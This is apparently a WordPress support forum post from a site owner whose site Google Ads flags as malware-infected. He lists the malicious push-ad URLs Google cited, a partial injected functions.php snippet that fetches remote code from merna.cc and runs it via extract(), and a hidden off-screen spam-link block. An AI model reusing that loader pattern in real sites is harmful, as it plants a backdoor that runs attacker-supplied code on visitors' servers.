HELP: Adwords says my site is infected but IMPOSIBLE TO FIND.

Hi all, the last thing I wanted to do is asking for help, since I thought I could solve my problem by myself by reading other’s questions’ answers or blogs, but I was not able. Here is my problem:

I created this website https://www.taxivic.cat years ago but two months ago I did some design updates, even changed the theme. Besides from that, I created another website https://www.koisse.com, sharing the same hosting (one folder is www and the other koisse) but different database (until 24h ago).
Also, I decided to do some Google Adwords and everything went fine until two weeks ago.

Google sent me an email saying that I have malware on my site, specifically:

https://deloton.com/apu.php?zoneid=1453906
https://go.mobisla.com/notice.php?p=1453909&interactive=1&pushup=1
https://go.onclasrv.com/apu.php?zoneid=1453906
https://go.pushnative.com/notice.php?p=1453909&interactive=1&pushup=1

Manually I found a script in functions.php with “merna.cc”:

if($tmpcontent = @file_get_contents("https://www.xxxxxx.cc/code1.php"))

{

extract(theme_temp_setup($tmpcontent));

}

elseif($tmpcontent = @file_get_contents_tcurl("https://www.merna.cc/code1.php"))

{

extract(theme_temp_setup($tmpcontent));

Also a base64 encoded script on header: 

<div style="position:absolute;top:0;left:-9999px;">
<a href="https://xxxxxxx.com" title="Best Free Joomla Templates & Extensions " target="_blank">All for Joomla</a>
<a href="https://xxxxxxxxx.net" title="Free Download Website Templates, WordPress Themes, Code Scripts, Plugins, GFX" target="_blank">The Word of Web Design</a>
</div>

The other website https://www.koisse.com was clean of these scripts.

Once deleted and sent to Google Adwords for revision, Adwords still say my site is “infected”.

Once deleted all the www folder (www.taxivic.cat), and not even installed a theme or a plugin and using a different database, Google Adwords says my site is still infected.

I used all the anti-malware plugins I could use, all the scan-websites I could check and all the “manual” tricks I could think of (even downloading the whole website and searching some keywords with Total Commander) and everything looked safe. The only think I am not sure is safe is this I found in https://www.koisse.com using pingdom: data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAACGFjVEwAAAABAAAAAcMq2TYAAAANSURBVAiZY2BgYPgPAAEEAQB9ssjfAAAAGmZjVEwAAAAAAAAAAQAAAAEAAAAAAAAAAAD6A+gBAbNU+2sAAAARZmRBVAAAAAEImWNgYGBgAAAABQAB6MzFdgAAAABJRU5ErkJggg== (when I decode it it downloads a .png picture to my computer which Kaspersky says it’s fine).

Can anyone tell me or check where are those links or scripts on my website?

I think I tried it all and I am a bit desperate.

Thank You.

Emilio.

• This topic was modified 7 years, 3 months ago by emilio1990.
• This topic was modified 7 years, 3 months ago by Steven Stern (sterndata). Reason: put code in backticks; moved from "everything else" to "fixing"
• This topic was modified 7 years, 3 months ago by Steven Stern (sterndata).

The page I need help with: [log in to see the link]